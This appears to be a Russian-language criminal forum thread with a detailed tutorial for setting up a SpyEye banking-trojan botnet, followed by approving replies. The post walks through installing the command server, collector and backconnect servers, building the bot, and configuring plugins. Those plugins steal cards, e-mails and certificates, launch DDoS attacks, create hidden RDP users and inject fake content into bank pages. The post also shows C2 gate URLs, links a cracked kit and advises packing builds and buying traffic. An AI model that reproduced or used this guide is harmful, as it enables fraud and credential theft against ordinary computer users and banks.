Туториал по SpyEyE

[halya]

Всем здрасте / привет / доброе утро / вечера.
Сегодня я хочу написать, о том, как можно создать / сотворить свой ботнет не имея каких-либо глубоких познаний в этом деле и даже финансов.
Статью первым делом предназначаю новичкам, но надеюсь что и более-менее продвинутые юзеры смогут почерпнуть для себя что то стоящее.
Прежде чем что то делать, нужно составить план действий, желательно чтоб он вперед расскрывал все аспекты дела. Давайте подумаем что нам нужно:

1. Конечно же софт, самое важное. Что выбрать? В момент написания статьи в паблеке есть только два бота: зевс и спай ( другие не буду считать,
так как они ни чем не лучше этих ). Что же выбрать с этих двоих? Зевс - малофункционален, простенький, да и информации в интернете о нем выше крыши, можно найти самому.
SpyEyE ( дальше спай ) - сложней установкой, но и пользы от него на порядок выше зевса По этому остановим свой выбор именно на нем.
2. Нужен сервер. В этом месте большинство моих читателей подумает что то вроде ("Ой да ну нахуй, это геморой, постоянные запары, проще зевс"), тут хочется сказать
"А где Вы видели простые пути? Всегда нужно чем то жертвовать ради достижения поставленных целей". Сервер можно взять любой, но важно помнить, чем больше будет ботов,
тем меньше будет его устойчивость. Если Вы решили работать серьезно - не пожалейте денег на него, а то в один прекрасный момент все может упасть.
3. В ходе работы нам нужны будут пару хостинг аккаунтов, для прокладок, и для клиентской части.


##### Установка серверной части #####



Что же, купив сервер, скачав исходники и сев в кресле поудобней, можно приступать к установке, а она у нас будет слегка затянутой и придется поработать пальцами в консоли
Первое что нам нужно - SSH клиент. Я буду использовать PuTTY ( Скачать его можно тут ).
Зачем он нам? Да для того чтоб удаленно получить консоль сервера линукс. Выглядит все это дело так:

Так же чтоб залить файлы на сервер, нам понадобиться такая программа как WinSCP ( Не хотим же через консоль ручами файлы заливать? ), скачать её можно тут.
Работать с ней тоже просто:

Кстати, в процессе может возникать ошибка "Permission denied", связана она с настройками Вашего фаерволла / ав, просто отключите контроль за приложением в опциях:

Настал тот момент, когда мы можем приступать непосредственно к установке.
Теперь можем распаковать наш архив, который Вы найдете в конце этой статьи ( Замечу что в нем весьма неплохая версия Спая, и максимально полная комплектация ), распаковываем в
любую папочку и получаем такую структуру:

Так как сейчас мы будем устанавливать сердце нашего ботнета ( гейт ), переходим в Server, дальше Gate И видим там 3 файла ( 2 из которых нам пока не нужны):

Вот и настал момент залива файлов на сервер, заходим в WinSCP, вводим наши данные и попадаем на наш сервер:

Сразу Вы можете попасть не сюда, так что кликаем

и пробираемся в корень
Дальше ищем папочку var, в ней www, переходим, и вот мы в веб каталоге. Зашли? теперь создаем папочку, назовем, допустим, gate. Вам советую быть оригинальней
Выйдет так:

Но прежде чем заливать файлы, давайте поставим права на папочку 777 ( Зачем? Да потому что инсталлеру придется отредактировать наш гейт файл ( записать туда данные подключения к базе данных) ).
Захватываем кликом мышки папку и жмем F9, видим окошко, выставляем права как на скрине:

Теперь переходим в gate и перекидываем туда наш архив ( Server\Gate\gate.tgz ), в результате увидим такое:

Вот теперь пришла очередь PuTTY, заходим на сервер, логинемся и мы на сервере:

Теперь нам стоит распаковать наш архив, который мы залили:

Нажав Ф5 в WinSCP, увидим:

С файлами разобрались, а теперь с базой данных ( Что это? Это место где будет храниться наша информация о ботах, их визитах и т.п., напоминает таблицу excel ).
Опять переходим в консоль и вводим:

Если все прошло ок, и мы видим

, мы в mysql консоли
Стоит запастись блокнотиком, так как сейчас мы будем создавать базы данных и пользователей под все наши творения, чтоб сделать все за один раз, и потом не лезть в бд снова.
Первым делом давайте создадим базу данных для гейта:

Видим между запросом и положительным результатом исполнения была ошибка, произошла из-за того что после подключения к бд и последней командой прошло слишком много времени
и пришлось реконектнуться, у Вас может быть что то подобное, так что обращаем внимание только на

.
Теперь создаем пользователя:

И даем ему нужные привилегии:

Дальше, точно так же создадим пользователя для клиентской части, тобишь админки ( Зачем? Авторами спая было задумана интересная структура, все серверное ПО делится на 2 части:
Собственно серверное и клиентское. То есть серверное ПО будет стоять непосредственно на нашем сервере, а клиентское, там где пожелает наша душа ) и выдаим ему нужные права:

Не закрывая консоль направляемся в веб инсталлер нашего гейта ( ип сервера/наша папка ( сейчас gate))/installer/ ):

Возможные ошибки:

Если все ок, мы увидим такое:

Инсталляция проходит не сразу, стоит подождать пока импортнется гео база, чтоб идентифицировть место жительства Ваших ботов , увидив картинку идем в WinSCP и сносим папку installer,
в итоге должно быть так:

Теперь хочу сказать пару слов насчет паливности Вашего сервера, если он не абузоустойчивый, да и вообще хоть и абузоустойчив, не стоит его лишний раз палить, для "анти-палива", используют прокладки:

Использовать её очень просто, но для начала стоит отредактировать ( открывать советую через Notepad++):

Можем спокойно размещать по хостингам, записывая url прокладки в файлик, дальше нам пригодиться.
Теперь давайте поставим gui нашего гейта, тобишь клиентскую часть главной админки, для этого нам сойдет любой хостинг, создаем там папочку, заливаем туда содержимое папки MainCP (SpyEyE\Server\MainCP):

Переходим в installer, там указываем наши данные:

( Если такое видим, то просто в корневом каталоге удаляем config.php )

И в результате:

Возможные ошибки:

Бывает, что даже введя правильно все, подключится никак не выходит. Для этого идем в /etc/mysql/ и открываем my.cnf:

Ищем bind-adress и ставим перед ним #, после чего сохраняем и перезапускаем mysql:

Все, главная админка поставлена, входим в неё ( не забывая перед этим удалить папку установки ).
Сейчас админка полудохлая, так как мы еще не установили основной функционал. Оставляем вкладку открытой, и идем ставить коллектор ( Что это? Коллектор - это демон ( Unix ),
который занимается приемом логов от Ваших машин и записью этих логов в базу данных ).
Переходим в нашу консоль и создаем базу данных и пользователей под коллектор:

Вводим exit, попадаем в основную консоль и пока её закрываем. С помощью WinSCP в корневом каталоге ищем папку home, переходим туда и создаем папку _sec, в неё забрасываем архив с демоном коллектора (distr.tgz ( SpyEye\Server\Collector )):

Теперь возвращаемся в нашу консоль и подготовим коллектор к установке:

Должно выйти так:

Теперь переходим в папку configs, и редактируем sec.config:

Фух Можно сказать установили, запускаем:

Если видите такую картинку, значит запуск прошел успешно, укрощение SpyEye почти удалось.
Для наглядности запустим менеджер ( Позволяет просматривать статистику демона ):

Так же важно добавить коллектор в автозапуск ( С нашими то хостерами ), идем в /etc/rc.local и добавляем "/home/_sec/sec -d", должно выйти так:

Теперь идем на наш хостинг, и ставим gui коллектора (SpyEye\Server\Form), после того как создали папочку и залили файлы, должно выйти вот так:

Переходим в веб инсталлер, вводим данные:

И если все ок, получаем:

 

[halya]

Удаляем папку installer и заходим в панель:

Вот и все, коллектор работает , но статья на этом не заканчивается, впереди еще установка backcoonect server'ov. Начнем пожалуй с socks5 & ftp сервера, поехали.
Берем winSCP и идем на сервер, опять заходим в папку home, в ней создаем папку _BC, должно выглядить все так:

Заливаем в папку _BC архив distrbc.tgz (SpyEye\Server\Backconnect\Backconnect Server (for SOCKS5 & FTP)):

Распаковываем и выставляем права:

Теперь входим в mysql:

Создаем пользователя и базу под backconnect server'a, чтоб больше не входить в mysql:

Если Вы читали статью, то разобраться где что у Вас проблем не составит
Теперь нам нужно отредактировать конфиг (config.xml):

Ну и запустить сервер, если все верно увидите такое:

Так же не забываем добавить в автозагрузку (/etc/rc.local), выйдет так:

Осталось добавить наш сервер в настройки основной админки:

И если все верно, увидим такое при переходе на вкладки socks 5 и ftp backconnect:

Все, настроили Дело за малым, rdp backconnect'om ( дальше рдп коннектом ), поехали.
С рдп будет проще, так как он идет как бинарник.
Опять открываем WinSCP, ищем в корне сервера папку tmp, туда закидываем debian.x86.tar.bz2 (SpyEye\Server\RDP Backconnect Server), конечно если у Вас дебиан, если цент, то centos.x86.tar.bz2 соответственно, в итоге так:

Опять заходим, распаковываем и устанавливаем:

Теперь идем в настройки демона, (/etc/dae/dae.conf), и редактируем его:

Все, настроили, запускаем демон:

Теперь правим в админке:

И если все верно, увидим такое:

Вот и все, серверная часть настроена Переходим к билдеру, тут тоже нужно будет слегка попотеть, но все намного быстрей



#### Собираем EXE ####



Наконец то покончили со скучным серверным ПО, переходим к сборке нашего зловреда, в SpyEye все иначе чем у зевса, в котором нужно всего несколько кликов для генерации билда и конфига .
Видим такую картину:

Хотелось бы сказать не много о файлах, прежде чем начнем:
Первыми идут 2 крякнутые версии спая и 1 оригинал, использовать будем конечно последнюю крякнутую
Потом файл changelog, кому интересно, может почитать, дальше collectors.txt, в нем указываются url коллекторов и порты, с новой строчки каждый. Настроятельно советую
прежде чем указывать домен, зарегестрировать его.
Дальше configdecoder.exe - приложение служит для декодирования конфиг файла в экстремальном случае, конечно нужен будет пароль шифрования конфига.
serial.txt пропускаем, settings.ini - настройки билдера.
uninstaller.exe - Удаляет бота из системы, для удаления нужен файл settings.ini, в котором хранится разная информация в том числе и о мютексе бота + имени exe.
Запускаем наш билдер ( 1.3.48 конечно ), и наблюдаем такую картинку:

Описание:

1. Ключ шифрования конфига ( config.bin ). Ключ вшивается в бота. При обновлениях не забывайте егоуказывать, ибо боты не смогут просто обновиться.
2. Если поставить галочку, то бот при стрте ось и обновлении будет очищать куки IE и FF, советую ставить.
3. Если поставить галочку, то будут удаленны все сертификаты с криптохранилища виндовс, и пользователю придется снова импортировать сертификат, который будет спижжен в колектор Паливная опция, ставьте на свое усмотрение.
4. В HTTP-отчётах много мусора. Таким образом, имеет смысл отправлять только HTTPS-отчёты (ну, и, плюс, HTTP-отчёты с данными Basic-авторизации). Именно это и делает эта опция ( От Автора ).
5. Если стоит галочка, файлы будут сжиматься upx'om, не советую ставить, если надумали криптовать, не все крипторы корректно обрабатывают upx. Лучше им упаковать уже после крипта.
6. несмотря на использование протокола HTTP 1.0 в FF инжектах, и на отсутствие хедера Accept-Encoding, некоторые вебсерверы могут присылать сжатый контент (например: gzip, deflate). В этом случае, SpyEye использует библиотеку zlib,
чтобы распаковать контент и проинжектить его. Итак, если вы уверены, что ресурсы на вебсерверах, с которыми работают ваши вебинжекты, всегда передаются в несжатом виде (в подавляющем большинстве случаев именно так и происходит),
то смело включайте эту опцию. Со включённой опцией, билдер генерирует билд бота без поддержки zlib'а. Это сэкономит 15-16KB размера билда (если измерять разницу сжатых UPX'ом билдов). Однако, в случае,
если прийдёт сжатый контент в FF, бот не сможет его инжектировать.
7. Опция определяет нужно ли включать в config.bin такие вещи как: webinjects, screenshots и плагины (кроме customconnector.dll). Дело в том, что в при создании билда бота, config.bin ВСЕГДА вшивается в тело бота. В свою очередь,
это влияет на размер exe'шника бота. Т.е. если вы используете тяжеловесные вебинжекты или плагины, то имеет смысл сделать билд без них, а config.bin разместить в главной админке. В этом случае, бот после отстука загрузит конфиг
из админки со всем необходимым инструментарием. Такой подход позволяет значительно сократить размер билда бота.
8. Сейчас уже почти не актуальная вещь, но если поставить галочку, то делу это ничем не повредит. Если Вы наблюдаете глюки/лаги в боте, знайте, эта галочка одна из возможных причин.
9. Фаерфокс вебинжекты, конечно включаем .
10. Формграббер опера ( Перехватывает ценные post запросы и отсылает в коллектор ).
11. Аналогично с хромом.
12. Имя нашего ехе в системе. Советую ставить читабельные имена, а не "STGRDGweRw".
13. Имя мютекса в системе ( Например второй раз бот с таким же мютексом не запустится ).

Вес файла:
Для создания легковесного config.bin — необходимо включить чекбокс Make LITE-config и нажать кнопку Make config & get build.
Создание билда бота с легковесным конфигом — необходимо нажать на кнопку Get build.
Для создания полновесного config.bin — необходимо выключить чекбокс Make LITE-config и нажать кнопку Make config & get build.

Таким образом, в папке билдера появится config.bin, который можно залить в админку и билд бота, который можно грузить:

## Скриншоты ##

В каталоге билдера у нас есть папка screenshots. В ней находятся тестовые файлы с правами сбора скриншотов. Скрины делаются при клике мыши.
Файл правил содержит строки, каждая из которых должна содержать пять параметров, разделяемых пробелами. Формат следующий:

%URL_MASK% %WIDTH% %HEIGHT% %MINIMUM_CLICKS% %MINIMUM_SECONDS%

Где:

URL_MASK - Маска URL. Если приложение грузит по URL ресурс, попадающий под эту маску, то включается соответствующее правило отправки скриншотов.
Правило управляется четырьмя параметрами, описанными ниже.
* Внимание! В маске поддерживается только символ "*" (звёздочка). Он означает ноль или более любых символов.
WIDTH - ширина скриншота.
HEIGHT - Высота скришота.
MINIMUM_CLICKS - Минимальное количество кликов, которое будет совершено прежде, чем соответствующее правило отключится.
MINIMUM_SECONDS - Минимальное количество секунд, которое пройдёт прежде, чем соответствующее правило отключится.

Правило отключится только при срабатывании MINIMUM_SECONDS и MINIMUM_CLICKS. Обоих!


Возникает вопрос - нафига нужны последних два параметра? Дело в том, что существует проблематика, связанная со скриншотами. Боту достаточно проблематично узнать на какой странице совершается клик
(например, ввиду того, что в браузере может быть множество вкладок). Поэтому, и сущетсвуют последние два параметра - чтобы так или иначе (опираясь на кол-во кликов и время, прошедшее с момента загрузки HTTP-ресурса, указанного в URL_MASK) выключать правило скриншотов.
* Внимание! Замечание по синтаксису. Не нужно добавлять символ переноса строки (Enter) в конец какого либо файла правил. При склеивании файлов, билдер добавит их автоматически.
Итак, ещё раз. Не нужно добавлять enter в конец файла правил скриншотов:

## Плагины ##


Переходим в папку plugins, в спае множество функционала которого нет в билдере сосредоточенно именно там:

Будем редактировать только cfg файлы (Через Notepad++), dll не трогаем

Начнем с самого верху и пойдем вниз:



#Bugreport (bugreport.dll)#



Внимание! Если Вы не имеете опыт работы с отладчиком ,то просто удалите этот плагин и его cfg конфиг, поверьте, Вам он не нужен.
Сделан для того, чтоб в случае креша на машине юзера, получить информацию о возможных причинах, иными словами если спай внезапно упадет, Вам в админку придет отчет, который стоит проанализировать и сделать выводы.
Выглядит это так:

Так же не забываем его включить в админке:

В итоге увидите такое:

В cfg Могут присутствывать такие параметры:

autostart — в этом случае, плагин не требуется включать из главной админки.
silent — в этом случае, поток, вызвавший исключение, переходит в спящее состояние.
dont — в этом случае, плагин не отправляет отчёты об исключения в коллектор.
slowly_uninstall — в этом случае плагин не снимает хуки при uninstall't бота (этот режим может использоваться для того, чтобы словить крэшбаги во время сноса и инсталла бота).

По умолчанию стоит silent, советую его и оставить.
Идем дальше.



#cc grabber (cc grabber.dll)#


В конфигурации не нуждается, включается сам.


#ccgrabber (ccgrabber.dll)#


Аналогично.


#creditgrab (creditgrab.dll)#


Аналогично.

Интро:

По желанию можно оставить какой то один из них, тут дело эксперементов, один официальный ( от автора (ccgrabber) ), другие самописные.


#customconnector (customconnector.dll)#


Важный плагин, можно сказать мост между ботом и главной админкой (gate.php). Помните я говорил создать прокладки и записать их в файл? Пришло их время
В cfg файл с каждой новой строки мы можем записывать url нашей прокладки / гейта и таймаут, тобишь формат такой:

url;interval_in_sec

Где:

url — путь до гейта (gate.php) по протоколу HTTP или HTTPS.
interval_in_sec — интервал отстука в конкретный гейт.

Пример:

http://spyeye.com/gate.php;900
http://spyeye2.com/gate.php;800

Если плагина нет, Вы можете получить такую мессагу:

Просто посмотрите есть ли customconnector.dll в папке плагинов, и если нет, залейте снова



#ddos (ddos.dll)#



Если Вы не планируете использовать - сразу удалите, вес билда будет меньше.

Собственно плагин предназначен для того чтоб заддосит какой то сервер, будь то google.com и т.п..
Конфиг плагина имеет следующий синтаксис:

type target port time
type target port time

Где:

type — тип DDoS'а. Поддерживаются следующие: slowloris/ssyn/udp. (ex: ssyn)
target — IP, либо хост сервера, который нужно за'DDoS'ить. (ex: spyeyetracker.abuse.ch)
port — порт, подвергаемый DDoS'у (для UPD DDoS'а можно указать 0, для выбора рандомного порта). (ex: 443)
time — время, в течении которого будет производиться DDoS (для UDP/SSYN используются секунды, для Slowloris - минуты). (ex: 100)

* Примечание. В конфиге плагина можно указать множество заданий на DDoS. (плагин переходит от одного задания к другому постепенно, не многопоточно)
* Примечание. Для типа DDoS'а Slowloris не нужно задавать порт. (по-умолчанию используется 80-ый)
* Примечание. Плагин требует включения со стороны админки.



# dnsapi (dnsapi.dll)#



Бывает что некоторые домены блокируются на уровне местных dns провайдеров.Всвязи с этим, имеется возможость указывать собственный список DNS-серверов. Имеет смысл указывать популярные DNS-серверы типа google dns.
В таком случае, бот, для ресолвинга домена из файлов customconnector.dll.cfg или collectors.txt в первую очередь будет использовать те DNS-серверы, которые указаны в настройках плагина.
Синтаксис точно такой же как и в collectors.txt.
* Примечание. Будьте внимательны, выбирая DNS-серверы. Проблематика заключается в том, что если домен не существует (или блокнут), то DNS-сервер не должен возвращать никаких IP.
Существуют DNS-серверы, которые возвращают IP даже в том случае, если домен не существует (например, OpenDNS). Это сделано с целью редиректа на сайт DNS-сервиса:

Вот такого быть не должно. Для тестирования работы того или иного DNS сервера предусмотрена тулза dnsclient.exe (SpyEye\Tools\DNSClient).



# emailgrabber (emailgrabber.dll)#



Грабит email и отсылает их в коллектор, после чего их можно найти в админке. В настройках не нуждается.



#ffcertgrabber (ffcertgrabber.dll) #



Базовая комплектация SpyEye'я занимается граббингом сертификатов только из крипто-хранилища Windows. Однако Firefox использует собственное хранилище сертификатов. Всвязи с этим, есть специальный плагин для граббинга сертификатов из FF.
Предусмотрен подбор паролей по словарю, в случае, если на профиль установелен мастер-пароль.
В конфиге плагина лишь одно значение - минимальное время ожидания перед отправкой сертификатов в коллектор (указывается в секундах).
Сграбленные сертификаты имеют префикс "FF ; ". Искать их можно там же где и сертификаты от IE:

* Примечание. Плагин не требует включения со стороны админки.
* Примечание. Пароль для импорта сграбленного сертификата уточняйте у автора.



#ftpbc (ftpbc.dll)#



Собственно, плагин поднимает FTP сервер на боте и предоставляет доступ к нему через backconnect сервер. В главной админке имеется интерфейс, позволяющий отображать список ftp'шников:

Подключаться к ботам можно через любой FTP-менеджер. Рекомендуется через FileZilla.

Плагин имеет такую структуру:

%BOTNAME%;%IP%;%PORT%;%RECONNECT_INTERVAL_MSEC%;%AUTORUN_FLAG%

%BOTNAME% — имя бота, отображаемое в админке. Рекомендуется имеено так и оставить ("%BOTNAME%"). В этом случае, плагин заменит этот текст на реальный GUID бота;
%IP% — IP backconnect сервера;
%PORT% — PORT, на котором backconnect сервер прослушивает коннекты от ботов. В разделе Backconnect Server (for SOCKS5 & FTP), он назывался ftp_port;
%RECONNECT_INTERVAL_MSEC% — время, которое плагин ожидает, в случае обрыва связи, прежде чем попробовать приконнектиться к серверу снова;
%AUTORUN_FLAG% — если 1, то SOCKS поднимается сразу, без команды админки;

* Примечание. Плагин требует включения со стороны админки (в случае, если не используется флаг %AUTORUN_FLAG%).

Пример использования:

%BOTNAME%;наш ip;3001;10;1

#jabbernotifier (jabbernotifier.dll)#



Плагин может использоваться для оповещения о заходе холдера на тот или иной линк через jabber.

Синтаксис:

entry "JabberNotifier"
%URL_MASK% %FLAGS% %POST_MASK%
end

Где:

URL_MASK — url маска, определяющая нужно ли отправлять message (URL, куда проследовал холдер).
FLAGS — поддерживаются флаги G, P, соответствующие тому или иному методу запроса.
POST_MASK — в случае, если используется флаг P, то можно использовать маску для данных этого POST-запроса.

Пример:

entry "JabberNotifier"
"*.bankofamerica.*" "G"
end

Настройки относительно того откуда и куда отправлять message, указываются в настройках главной админки (раздел jabber_notifier):

#rdp (rdp.dll)#


Плагин поднимает RDP-сервер и прокидывает его до Backconnect сервера. Кроме этого, плагин реализует создание сокрытого пользователя, который и нужен для удалённого использования ПК по протоколу RDP.
Ещё, в плагине предусмотрена панель управления для запуска любого процеса от любого залогиненого пользователя в системе (чтобы можно было создавать процессы от имени оригинального поьлзователя).
Более того, в плагин встроена Portable-версия TotalCommander'а, загружаемого из интернета и запускаемого прямо из памяти (без дампа на диск).
Иначе говоря мы можем подключиться к нашему юзеру как к дедику

Итак. Конфиг плагина имеет примерно такую структуру:

%IP_OF_BC_SERVER%:%PORT_OF_BC_SERVER%;%MAGIC_CODE%;%WINDOWS_LOGIN%;%WINDOWS_PASSWORD%;%URL_TO_PORTABLE_TCMD%

%IP_OF_BC_SERVER% — IP Backconnect сервера
%PORT_OF_BC_SERVER% — порт, на котором RDP-демон слушает коннекты от ботов (в конфиге серверной части он носит название cfg_rdp_port_in)
%MAGIC_CODE% — строка для аутентификации подключаемых клиентов (в конфиге серверной части оно носит название magic_code)
%WINDOWS_LOGIN% — имя учётной записи скрытого пользователя в ОС бота.
Внимание! Имя должно быть максимально уникальным. Ибо плагин перетрёт существующую учётку с именем %WINDOWS_LOGIN%. Кроме этого, не используйте имена учётных записей, длина которых меньше 8-ми символов. В противном случае, некоторые ОС (Windows Server 2003, например) просто не позволят создать такую учётку.
%WINDOWS_PASSWORD% — пароль пользователя %WINDOWS_LOGIN%.
* Примечание. Используйте пароли, в которых имеются буквы в нижнем и верхнем регистрах, а также присудствуют цифры. Причина описана пунктом выше.
%URL_TO_PORTABLE_TCMD% — прямая ссылка до ptcmd.exe. Именно оттуда будет скачиваться TotalCMD, если вы нажмёте кнопку во встроенной клиентской программе плагина RunAsEx GUI

Пример:

Наш ip:30000:magic_code:ImAdMiN:iMaDmIn:link to portatable totalcommander

Плагин включается через главную админку. Список ботов можно увидеть в соответствующем пункте меню (RDP). Подключаться к ботам можно через стандартную Windows-тулзу mstsc.exe Remote Desktop Connection:

Минусы плагина:

- Нет поддержки x64 систем;
- Плагину нужны права администратора для работы;
- Не поддерживается Win7 Starter (именно Starter);



#socks5 (socks5.dll)#



Собственно, плагин поднимает SOCKS5 сервер на боте и предоставляет доступ к нему через backconnect сервер. В главной админке имеется интерфейс, позволяющий отображать список соксов:

Конфиг плагина имеет следующую структуру:

%BOTNAME%;%IP%;%PORT%;%RECONNECT_INTERVAL_MSEC%;%AUTORUN_FLAG%

Где:

%BOTNAME% — имя бота, отображаемое в админке. Рекомендуется имеено так и оставить ("%BOTNAME%"). В этом случае, плагин заменит этот текст на реальный GUID бота;
%IP% — IP backconnect сервера;
%PORT% — PORT, на котором backconnect сервер прослушивает коннекты от ботов. В разделе Backconnect Server (for SOCKS5 & FTP), он назывался socks_port;
%RECONNECT_INTERVAL_MSEC% — время, которое плагин ожидает, в случае обрыва связи, прежде чем попробовать приконнектиться к серверу снова;
%AUTORUN_FLAG% — если 1, то SOCKS поднимается сразу, без команды админки;

* Примечание. Плагин требует включения со стороны админки (в случае, если не используется флаг %AUTORUN_FLAG%).

Пример:

%BOTNAME%;Ваш ип;3000;10;1

#webfakes (webfakes.dll)#



Плагин webfakes может использоваться для подмены содержимого HTTP и HTTPS ресурсов без обращения к оригинальному вебсерверу в браузерах IE и FF. Конфиг плагина совместим в форматом Zeus'овских вебфейков и выглядит следующим образом:

entry "WebFakes"
%URL_MASK% %URL_REDIRECT% %FLAGS% %POST_BLACK_MASK% %POST_WHITE_MASK% %BLOCK_URL% %WEBFAKE_NAME% %UNBLOCK_URL%
end

Где:

URL_MASK — url маска, определяющая нужен ли фейк для конкретного HTTP/HTTPS ресурса.
URL_REDIRECT — url ресурса, контент которого будет отображаться вместо контента оригинального ресурса.
FLAGS — поддерживаются флаги G, P а также A. Последний флаг может использоваться для того, чтобы бот вставил дополнительные заголовки BG (BotGuid) и REF (Refferer. То есть URL ресурса, для которого делается фейк) в HTTP хедер при обращении к URL_REDIRECT.
POST_BLACK_MASK — black-маска POST-запроса, при котором правило фейка переходит в режим блокировки (то есть перестаёт работать).
POST_WHITE_MASK — если задана White-маска POST-запроса, то фейк не будет работать до тех пор, пока не отправится подходящий под эту маску POST-запрос.
BLOCK_URL — block-маска фейка может использоваться для блокировки фейка при обращении к определённому url'у.
WEBFAKE_NAME — имя вебфека. Не особо понятно зачем нужно. Возможно, было зарезервировано в Zeus'е для ручного управления фейками. Не используется.
UNBLOCK_URL — может использоваться для снятия состяния блокировки с фейка, при обращении к определённому url'у.

Пример:

entry "WebFakes"
"google.com" "mygoogle.com" "GP" "" ""
end

## Возможные проблемы и их решение ##

Q - Бот не стучит. Что делать?
A - Без паники, если отстука нет, просто ждем еще 5 минут для уверенности, мало что, если бот все еще не появился в панеле, тогда:
1. Проверяем настройки customconnector.dll (SpyEye\Builder\plugins), не забываем, что даже ip нужно указывать в таком виде:

http://ip/gate.php;таймаут

Если проблема все еще не решена, проверяем настройки плагина dnsapi.dll (SpyEye\Builder\plugins), если и там все верно, то проблема в нашем гейте:
Проверяем правильность данных подключения к базе данных, для этого идем в /var/www/gate/gate.php ( В нашем случае ), открываем его блокнотом :

Внимание! В 99 % случаях это должно помочь. Так же тестируйте не на одном, а на несколько пк, возможно отстук заблокировал фаерволл или антивирус.

Q - Нет логов, логи просто не доходят. Что делать?
A - Не паникуем, проверяем наш файл

, в нем должны быть вписаны наши коллекторы в таком формате:

Все ок? Но логов все нет? Да, видимо мы пытаемся слушать занятый порт
Открываем WinSCP, идем в /home/_sec/configs/, открываем наш sec.config:

Теперь перезапустим демона:

В итоге все будет работать

 

[halya]

## Инжекты ##

Мы совсем не говорили про инжекты, в спае инжекты нам не нужно указывать в конфиге, они автоматически подгрузятся с папки webinjects (SpyEye\Builder\webinjects):

Тут все просто, ищете и добавляете

Ну, а как мне создавать свои инжекты? - Спросите вы, я отвечу, просто!. Абсолютно каждый может это сделать, и не нужно каждый раз создавать новый билд Спая

Для этого был создан WebInjectesDev - набор средств для разработки тестирования инжектов. Найти его можно в SpyEye\Tools\WebInjectsDev, в состав входят:

userDefineLang.xml — подсветка синтаксиса для текстового редактора Notepad++. Чтобы добавить подсветку синтаксиса Zeus'овских инжектов, необходимо скопировать файл userDefineLang.xml в папку "%APPDATA%\Notepad++\".
ffhookdll.dll — эту dll можно добавить прямо в таблицу импорта браузера Mozilla Firefox. Например, с помощью программы типа CFF Explorer. Кроме этого, можно использовать программу Remote DLL (для внедрения ffhookdll.dll напрямую в адресное пространство процесса), если нет возможности редактировать исполняемый файл FF.
iehookdll.dll — всилу особенностей браузера IE, эту dll можно внедрять только с помощью программы типа Remote DLL.

Итак. Вы размещаете свои вебинжекты в файле "C:\webinjects.txt", и внедряете dll в соответствующий браузер. После чего ежесекундно, код, внедрённый в браузер, поверяет файл вебинжектов на наличие изменений. Если изменения есть, то инжекты загружаются в браузер. Такой подход позволяет сэкономить время от внесения изменений в файл вебинжектов до отображения их в браузере. Т.е. чтобы тестировать или писать вебинжекты, не нужно иметь запущенного бота в системе. Доста??очно просто использовать dll'ки в комплекте WebInjectesDev.

Многие теряются не зная как внедрить библиотеку в браузер:

1. Нам понадобиться CFF Explorer ( SpyEye\Tools\WebInjectsDev\tools\ExplorerSuite.exe).
2. Старая версия firefox:

Ищем нашу папку мозиллы, находим там firefox.exe и переносим его в наш CFF Explorer, увидите такую картину:

Переходим в вкладку "Import added" и делаем как на скринах:

1. Тыкаем Add и выбираем наш ffhookdll.dll.
2. Нажимаем на 00000... .
3. После чего Import by Ordinal.
4. Дальше клацаем Rebuild Import Table.
5. Ну и сохраняем, желательно сделать бэкап оригинального, а тот что вышел назвать firefox.exe.
Вот и все Теперь Вы разработчик вэб инжектов.

Кстати, можете поискать, полно мануалов ещё есть по написанию инжей, если кому интересно

### Завершение ###

Ну что же, отредактировав наконец массу конфигов, можно спокойно вздохнуть, дело за 2 кликами

Идем в наш билдер и кликаем:

Если все верно, сбоку вылетает кнопочка:

Тыкаем, и наслаждаемся мессагой:

Дальше что деладь с билдом и так ясно, криптуем, покупаем трафф, арендуем связку и вперед

Для наглядности:

Сегодня мы увидели как без особых усилий мы подняли один из самых сложных по установке ботов

Не много о статье, получилась она ( по мнению автора ), подробной и простой. Главное следовать инструкции и ничего не пропускать, тогда у Вас обязательно все выйдет.
На написание, редактирование, изменение, дописание, добавление, уточнение статьи было затрачено около 24 часов Представьте себе состояние автора, у которого 1:43 ночи и он пишет последние строки

Всем желаю удачи, да прибудут с Вами $$$

Собственно софт http://www.sendspace.com/file/p2ffa2

P.S. В следующей статье разберемся с хостингом под наш ботнет Сделаем свой)

Специально для c.pro by halya

 

[McGrath]

Это не полнеший туториал, а базовый - установка.
Полнейший это когда ты опишешь каждую функцию + функции DLL API, и многое другое. Но за старания плюс, а то тут большинство не знают куда пароль по ssh вводить.

 

[halya]

Это не полнеший туториал, а базовый - установка.
Полнейший это когда ты опишешь каждую функцию + функции DLL API, и многое другое. Но за старания плюс, а то тут большинство не знают куда пароль по ssh вводить.

спасибо, учтем, если можно, подкоректируйте название топика

 

[usaXYusa]

Ай молодца!!! Я бегло прочитал, в подробности не вдавался, но в целом - все четко расписано. Пару лет назад был в поисках такого мануала, новичкам оч полезно будет, да и не только новичкам, я думаю)

 

[Meyson]

Хороший мануал! Поставил +1 за старания !

 

[Ninja]

Только за количество картинок ставлю +

 

[xA! | Kill yourself]

пару пикч оптимизировать бы, для избавления от горизонтального скрола(но это так придирка к оформлению).
а по сабжу крачавчик +

 

[adlet]

чОтко. Сыпасыбо! ждем вторую статью про абузы)

 

[halya]

Мерси всем, про серв будет тоже, xA! | Kill yourself учту.

 

[Shimel]

описал все красиво, спасибо за старания)
ЗЫ: не увидел обещанный архив на спай

 

[halya]

описал все красиво, спасибо за старания)
ЗЫ: не увидел обещанный архив на спай

Спс, опять забылвчера 2 раза хотел добавить, залью позже.

 

[borisss]

+1. акуенно все расписал, все по шагово. ТВои старания залуживают большого уважения. Поставил бы плюс если бы мог))
Наверное выбился в лидеры по конкурсу от мистера главного Пасона-Масона.))

 

[blade2010]

Сам както занимался установкой спая и зевса. Молодец хорошо описал. +++

 

[Mr.Medved]

Тоже долго искал обещаннй архив. А то у меня какой то старый валяется. Статья хорошая.

 

[anrew]

Угомонитесь от него толку как от козла молока плагины не работают в билдере у зевса шансов больше чем у этого глаза

 

[Mr.Medved]

del

 

[halya]

Обновил пост, в конце статьи архив.

 

[patapap]

Очень хорошая статья. Пока, что самая лучшая в конкурсе(сугубо моё мнение). Плюс однозначно!